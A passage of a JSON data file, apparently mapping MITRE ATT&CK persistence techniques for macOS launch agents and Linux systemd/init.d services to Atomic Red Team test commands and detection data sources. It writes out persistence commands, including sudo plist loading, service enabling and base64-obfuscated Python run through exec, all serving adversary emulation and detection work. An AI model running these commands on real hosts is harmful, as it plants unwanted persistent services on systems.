"source_data_element": "process", + "relationship": "accessed", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "process" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1543.001", + "command_list": [ + "if [ ! -d ~/Library/LaunchAgents ]; then mkdir ~/Library/LaunchAgents; fi;\nsudo cp #{path_malicious_plist} ~/Library/LaunchAgents/com.atomicredteam.plist\nsudo launchctl load -w ~/Library/LaunchAgents/com.atomicredteam.plist\n", + "if [ ! -d ~/Library/LaunchAgents ]; then mkdir ~/Library/LaunchAgents; fi;\nsudo cp $PathToAtomicsFolder/T1543.001/src/atomicredteam_T1543_001.plist ~/Library/LaunchAgents/#{plist_filename}\nsudo launchctl load -w ~/Library/LaunchAgents/#{plist_filename}\n" + ], + "commands": [ + { + "command": "if [ ! -d ~/Library/LaunchAgents ]; then mkdir ~/Library/LaunchAgents; fi;\nsudo cp #{path_malicious_plist} ~/Library/LaunchAgents/com.atomicredteam.plist\nsudo launchctl load -w ~/Library/LaunchAgents/com.atomicredteam.plist\n", + "source": "atomics/T1543.001/T1543.001.yaml", + "name": "Atomic Red Team Test - Create or Modify System Process: Launch Agent" + }, + { + "command": "if [ ! -d ~/Library/LaunchAgents ]; then mkdir ~/Library/LaunchAgents; fi;\nsudo cp $PathToAtomicsFolder/T1543.001/src/atomicredteam_T1543_001.plist ~/Library/LaunchAgents/#{plist_filename}\nsudo launchctl load -w ~/Library/LaunchAgents/#{plist_filename}\n", + "source": "atomics/T1543.001/T1543.001.yaml", + "name": "Atomic Red Team Test - Create or Modify System Process: Launch Agent" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1543.001", + "display_name": "Create or Modify System Process: Launch Agent", + "atomic_tests": [ + { + "name": "Launch Agent", + "auto_generated_guid": "a5983dee-bf6c-4eaf-951c-dbc1a7b90900", + "description": "Create a plist and execute it\n", + "supported_platforms": [ + "macos" + ], + "input_arguments": { + "plist_filename": { + "description": "filename", + "type": "String", + "default": "com.atomicredteam.plist" + }, + "path_malicious_plist": { + "description": "Name of file to store in cron folder", + "type": "String", + "default": "$PathToAtomicsFolder/T1543.001/src/atomicredteam_T1543_001.plist" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "The shared library must exist on disk at specified location (#{path_malicious_plist})\n", + "prereq_command": "if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "echo \"The shared library doesn't exist. Check the path\"; exit 1;\n" + } + ], + "executor": { + "name": "bash", + "elevation_required": true, + "command": "if [ ! -d ~/Library/LaunchAgents ]; then mkdir ~/Library/LaunchAgents; fi;\nsudo cp #{path_malicious_plist} ~/Library/LaunchAgents/#{plist_filename}\nsudo launchctl load -w ~/Library/LaunchAgents/#{plist_filename}\n", + "cleanup_command": "sudo launchctl unload ~/Library/LaunchAgents/#{plist_filename}\nsudo rm ~/Library/LaunchAgents/#{plist_filename}\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service creation", + "description": "A service/daemon was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service modification", + "description": "A service/daemon was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service modification", + "description": "A service/daemon was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "service" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ] + ] + }, + { + "technique_id": "T1543.002", + "command_list": [ + "echo \"[Unit]\" > /etc/systemd/system/#{systemd_service_file}\necho \"Description=Atomic Red Team Systemd Service\" >> /etc/systemd/system/#{systemd_service_file}\necho \"\" >> /etc/systemd/system/#{systemd_service_file}\necho \"[Service]\" >> /etc/systemd/system/#{systemd_service_file}\necho \"Type=simple\"\necho \"ExecStart=#{execstart_action}\" >> /etc/systemd/system/#{systemd_service_file}\necho \"ExecStartPre=#{execstartpre_action}\" >> /etc/systemd/system/#{systemd_service_file}\necho \"ExecStartPost=#{execstartpost_action}\" >> /etc/systemd/system/#{systemd_service_file}\necho \"ExecReload=#{execreload_action}\" >> /etc/systemd/system/#{systemd_service_file}\necho \"ExecStop=#{execstop_action}\" >> /etc/systemd/system/#{systemd_service_file}\necho \"ExecStopPost=#{execstoppost_action}\" >> /etc/systemd/system/#{systemd_service_file}\necho \"\" >> /etc/systemd/system/#{systemd_service_file}\necho \"[Install]\" >> /etc/systemd/system/#{systemd_service_file}\necho \"WantedBy=default.target\" >> /etc/systemd/system/#{systemd_service_file}\nsystemctl daemon-reload\nsystemctl enable #{systemd_service_file}\nsystemctl start #{systemd_service_file}\n", + "echo \"[Unit]\" > #{systemd_service_path}/art-systemd-service.service\necho \"Description=Atomic Red Team Systemd Service\" >> #{systemd_service_path}/art-systemd-service.service\necho \"\" >> #{systemd_service_path}/art-systemd-service.service\necho \"[Service]\" >> #{systemd_service_path}/art-systemd-service.service\necho \"Type=simple\"\necho \"ExecStart=#{execstart_action}\" >> #{systemd_service_path}/art-systemd-service.service\necho \"ExecStartPre=#{execstartpre_action}\" >> #{systemd_service_path}/art-systemd-service.service\necho \"ExecStartPost=#{execstartpost_action}\" >> #{systemd_service_path}/art-systemd-service.service\necho \"ExecReload=#{execreload_action}\" >> #{systemd_service_path}/art-systemd-service.service\necho \"ExecStop=#{execstop_action}\" >> #{systemd_service_path}/art-systemd-service.service\necho \"ExecStopPost=#{execstoppost_action}\" >> #{systemd_service_path}/art-systemd-service.service\necho \"\" >> #{systemd_service_path}/art-systemd-service.service\necho \"[Install]\" >> #{systemd_service_path}/art-systemd-service.service\necho \"WantedBy=default.target\" >> #{systemd_service_path}/art-systemd-service.service\nsystemctl daemon-reload\nsystemctl enable art-systemd-service.service\nsystemctl start art-systemd-service.service\n", + "echo \"[Unit]\" > #{systemd_service_path}/#{systemd_service_file}\necho \"Description=Atomic Red Team Systemd Service\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Service]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"Type=simple\"\necho \"ExecStart=#{execstart_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPre=#{execstartpre_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPost=#{execstartpost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecReload=#{execreload_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStop=#{execstop_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStopPost=/bin/touch /tmp/art-systemd-execstoppost-marker\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Install]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"WantedBy=default.target\" >> #{systemd_service_path}/#{systemd_service_file}\nsystemctl daemon-reload\nsystemctl enable #{systemd_service_file}\nsystemctl start #{systemd_service_file}\n", + "echo \"[Unit]\" > #{systemd_service_path}/#{systemd_service_file}\necho \"Description=Atomic Red Team Systemd Service\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Service]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"Type=simple\"\necho \"ExecStart=#{execstart_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPre=#{execstartpre_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPost=#{execstartpost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecReload=/bin/touch /tmp/art-systemd-execreload-marker\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStop=#{execstop_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStopPost=#{execstoppost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Install]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"WantedBy=default.target\" >> #{systemd_service_path}/#{systemd_service_file}\nsystemctl daemon-reload\nsystemctl enable #{systemd_service_file}\nsystemctl start #{systemd_service_file}\n", + "echo \"[Unit]\" > #{systemd_service_path}/#{systemd_service_file}\necho \"Description=Atomic Red Team Systemd Service\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Service]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"Type=simple\"\necho \"ExecStart=/bin/touch /tmp/art-systemd-execstart-marker\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPre=#{execstartpre_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPost=#{execstartpost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecReload=#{execreload_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStop=#{execstop_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStopPost=#{execstoppost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Install]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"WantedBy=default.target\" >> #{systemd_service_path}/#{systemd_service_file}\nsystemctl daemon-reload\nsystemctl enable #{systemd_service_file}\nsystemctl start #{systemd_service_file}\n", + "echo \"[Unit]\" > #{systemd_service_path}/#{systemd_service_file}\necho \"Description=Atomic Red Team Systemd Service\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Service]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"Type=simple\"\necho \"ExecStart=#{execstart_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPre=#{execstartpre_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPost=#{execstartpost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecReload=#{execreload_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStop=/bin/touch /tmp/art-systemd-execstop-marker\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStopPost=#{execstoppost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Install]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"WantedBy=default.target\" >> #{systemd_service_path}/#{systemd_service_file}\nsystemctl daemon-reload\nsystemctl enable #{systemd_service_file}\nsystemctl start #{systemd_service_file}\n", + "echo \"[Unit]\" > #{systemd_service_path}/#{systemd_service_file}\necho \"Description=Atomic Red Team Systemd Service\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Service]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"Type=simple\"\necho \"ExecStart=#{execstart_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPre=/bin/touch /tmp/art-systemd-execstartpre-marker\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPost=#{execstartpost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecReload=#{execreload_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStop=#{execstop_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStopPost=#{execstoppost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Install]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"WantedBy=default.target\" >> #{systemd_service_path}/#{systemd_service_file}\nsystemctl daemon-reload\nsystemctl enable #{systemd_service_file}\nsystemctl start #{systemd_service_file}\n", + "echo \"[Unit]\" > #{systemd_service_path}/#{systemd_service_file}\necho \"Description=Atomic Red Team Systemd Service\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Service]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"Type=simple\"\necho \"ExecStart=#{execstart_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPre=#{execstartpre_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPost=/bin/touch /tmp/art-systemd-execstartpost-marker\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecReload=#{execreload_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStop=#{execstop_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStopPost=#{execstoppost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Install]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"WantedBy=default.target\" >> #{systemd_service_path}/#{systemd_service_file}\nsystemctl daemon-reload\nsystemctl enable #{systemd_service_file}\nsystemctl start #{systemd_service_file}\n", + "cat > /etc/init.d/T1543.002 << EOF\n#!/bin/bash\n### BEGIN INIT INFO\n# Provides : Atomic Test T1543.002\n# Required-Start: $all\n# Required-Stop : \n# Default-Start: 2 3 4 5\n# Default-Stop: \n# Short Description: Atomic Test for Systemd Service Creation\n### END INIT INFO\npython3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))\"\nEOF\n\nchmod +x /etc/init.d/T1543.002\nif [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 defaults; elif [ $(cat /etc/os-release | grep -i 'ID=\"centos\"') ]; then chkconfig T1543.002 on ; else echo \"Please run this test on Ubnutu , kali OR centos\" ; fi ;\nsystemctl enable T1543.002\nsystemctl start T1543.002\n\necho \"python3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\\\"\" | sudo tee -a /etc/init.d/T1543.002\nsystemctl daemon-reload\nsystemctl restart T1543.002\n" + ], + "commands": [ + { + "command": "echo \"[Unit]\" > /etc/systemd/system/#{systemd_service_file}\necho \"Description=Atomic Red Team Systemd Service\" >> /etc/systemd/system/#{systemd_service_file}\necho \"\" >> /etc/systemd/system/#{systemd_service_file}\necho \"[Service]\" >> /etc/systemd/system/#{systemd_service_file}\necho \"Type=simple\"\necho \"ExecStart=#{execstart_action}\" >> /etc/systemd/system/#{systemd_service_file}\necho \"ExecStartPre=#{execstartpre_action}\" >> /etc/systemd/system/#{systemd_service_file}\necho \"ExecStartPost=#{execstartpost_action}\" >> /etc/systemd/system/#{systemd_service_file}\necho \"ExecReload=#{execreload_action}\" >> /etc/systemd/system/#{systemd_service_file}\necho \"ExecStop=#{execstop_action}\" >> /etc/systemd/system/#{systemd_service_file}\necho \"ExecStopPost=#{execstoppost_action}\" >> /etc/systemd/system/#{systemd_service_file}\necho \"\" >> /etc/systemd/system/#{systemd_service_file}\necho \"[Install]\" >> /etc/systemd/system/#{systemd_service_file}\necho \"WantedBy=default.target\" >> /etc/systemd/system/#{systemd_service_file}\nsystemctl daemon-reload\nsystemctl enable #{systemd_service_file}\nsystemctl start #{systemd_service_file}\n", + "source": "atomics/T1543.002/T1543.002.yaml", + "name": "Atomic Red Team Test - Create or Modify System Process: Systemd Service" + }, + { + "command": "echo \"[Unit]\" > #{systemd_service_path}/art-systemd-service.service\necho \"Description=Atomic Red Team Systemd Service\" >> #{systemd_service_path}/art-systemd-service.service\necho \"\" >> #{systemd_service_path}/art-systemd-service.service\necho \"[Service]\" >> #{systemd_service_path}/art-systemd-service.service\necho \"Type=simple\"\necho \"ExecStart=#{execstart_action}\" >> #{systemd_service_path}/art-systemd-service.service\necho \"ExecStartPre=#{execstartpre_action}\" >> #{systemd_service_path}/art-systemd-service.service\necho \"ExecStartPost=#{execstartpost_action}\" >> #{systemd_service_path}/art-systemd-service.service\necho \"ExecReload=#{execreload_action}\" >> #{systemd_service_path}/art-systemd-service.service\necho \"ExecStop=#{execstop_action}\" >> #{systemd_service_path}/art-systemd-service.service\necho \"ExecStopPost=#{execstoppost_action}\" >> #{systemd_service_path}/art-systemd-service.service\necho \"\" >> #{systemd_service_path}/art-systemd-service.service\necho \"[Install]\" >> #{systemd_service_path}/art-systemd-service.service\necho \"WantedBy=default.target\" >> #{systemd_service_path}/art-systemd-service.service\nsystemctl daemon-reload\nsystemctl enable art-systemd-service.service\nsystemctl start art-systemd-service.service\n", + "source": "atomics/T1543.002/T1543.002.yaml", + "name": "Atomic Red Team Test - Create or Modify System Process: Systemd Service" + }, + { + "command": "echo \"[Unit]\" > #{systemd_service_path}/#{systemd_service_file}\necho \"Description=Atomic Red Team Systemd Service\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Service]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"Type=simple\"\necho \"ExecStart=#{execstart_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPre=#{execstartpre_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPost=#{execstartpost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecReload=#{execreload_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStop=#{execstop_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStopPost=/bin/touch /tmp/art-systemd-execstoppost-marker\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Install]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"WantedBy=default.target\" >> #{systemd_service_path}/#{systemd_service_file}\nsystemctl daemon-reload\nsystemctl enable #{systemd_service_file}\nsystemctl start #{systemd_service_file}\n", + "source": "atomics/T1543.002/T1543.002.yaml", + "name": "Atomic Red Team Test - Create or Modify System Process: Systemd Service" + }, + { + "command": "echo \"[Unit]\" > #{systemd_service_path}/#{systemd_service_file}\necho \"Description=Atomic Red Team Systemd Service\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Service]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"Type=simple\"\necho \"ExecStart=#{execstart_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPre=#{execstartpre_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPost=#{execstartpost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecReload=/bin/touch /tmp/art-systemd-execreload-marker\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStop=#{execstop_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStopPost=#{execstoppost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Install]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"WantedBy=default.target\" >> #{systemd_service_path}/#{systemd_service_file}\nsystemctl daemon-reload\nsystemctl enable #{systemd_service_file}\nsystemctl start #{systemd_service_file}\n", + "source": "atomics/T1543.002/T1543.002.yaml", + "name": "Atomic Red Team Test - Create or Modify System Process: Systemd Service" + }, + { + "command": "echo \"[Unit]\" > #{systemd_service_path}/#{systemd_service_file}\necho \"Description=Atomic Red Team Systemd Service\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Service]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"Type=simple\"\necho \"ExecStart=/bin/touch /tmp/art-systemd-execstart-marker\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPre=#{execstartpre_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPost=#{execstartpost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecReload=#{execreload_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStop=#{execstop_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStopPost=#{execstoppost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Install]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"WantedBy=default.target\" >> #{systemd_service_path}/#{systemd_service_file}\nsystemctl daemon-reload\nsystemctl enable #{systemd_service_file}\nsystemctl start #{systemd_service_file}\n", + "source": "atomics/T1543.002/T1543.002.yaml", + "name": "Atomic Red Team Test - Create or Modify System Process: Systemd Service" + }, + { + "command": "echo \"[Unit]\" > #{systemd_service_path}/#{systemd_service_file}\necho \"Description=Atomic Red Team Systemd Service\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Service]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"Type=simple\"\necho \"ExecStart=#{execstart_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPre=#{execstartpre_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPost=#{execstartpost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecReload=#{execreload_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStop=/bin/touch /tmp/art-systemd-execstop-marker\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStopPost=#{execstoppost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Install]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"WantedBy=default.target\" >> #{systemd_service_path}/#{systemd_service_file}\nsystemctl daemon-reload\nsystemctl enable #{systemd_service_file}\nsystemctl start #{systemd_service_file}\n", + "source": "atomics/T1543.002/T1543.002.yaml", + "name": "Atomic Red Team Test - Create or Modify System Process: Systemd Service" + }, + { + "command": "echo \"[Unit]\" > #{systemd_service_path}/#{systemd_service_file}\necho \"Description=Atomic Red Team Systemd Service\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Service]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"Type=simple\"\necho \"ExecStart=#{execstart_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPre=/bin/touch /tmp/art-systemd-execstartpre-marker\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPost=#{execstartpost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecReload=#{execreload_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStop=#{execstop_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStopPost=#{execstoppost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Install]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"WantedBy=default.target\" >> #{systemd_service_path}/#{systemd_service_file}\nsystemctl daemon-reload\nsystemctl enable #{systemd_service_file}\nsystemctl start #{systemd_service_file}\n", + "source": "atomics/T1543.002/T1543.002.yaml", + "name": "Atomic Red Team Test - Create or Modify System Process: Systemd Service" + }, + { + "command": "echo \"[Unit]\" > #{systemd_service_path}/#{systemd_service_file}\necho \"Description=Atomic Red Team Systemd Service\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Service]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"Type=simple\"\necho \"ExecStart=#{execstart_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPre=#{execstartpre_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPost=/bin/touch /tmp/art-systemd-execstartpost-marker\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecReload=#{execreload_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStop=#{execstop_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStopPost=#{execstoppost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Install]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"WantedBy=default.target\" >> #{systemd_service_path}/#{systemd_service_file}\nsystemctl daemon-reload\nsystemctl enable #{systemd_service_file}\nsystemctl start #{systemd_service_file}\n", + "source": "atomics/T1543.002/T1543.002.yaml", + "name": "Atomic Red Team Test - Create or Modify System Process: Systemd Service" + }, + { + "command": "cat > /etc/init.d/T1543.002 << EOF\n#!/bin/bash\n### BEGIN INIT INFO\n# Provides : Atomic Test T1543.002\n# Required-Start: $all\n# Required-Stop : \n# Default-Start: 2 3 4 5\n# Default-Stop: \n# Short Description: Atomic Test for Systemd Service Creation\n### END INIT INFO\npython3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))\"\nEOF\n\nchmod +x /etc/init.d/T1543.002\nif [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 defaults; elif [ $(cat /etc/os-release | grep -i 'ID=\"centos\"') ]; then chkconfig T1543.002 on ; else echo \"Please run this test on Ubnutu , kali OR centos\" ; fi ;\nsystemctl enable T1543.002\nsystemctl start T1543.002\n\necho \"python3 -c \\\"import os, 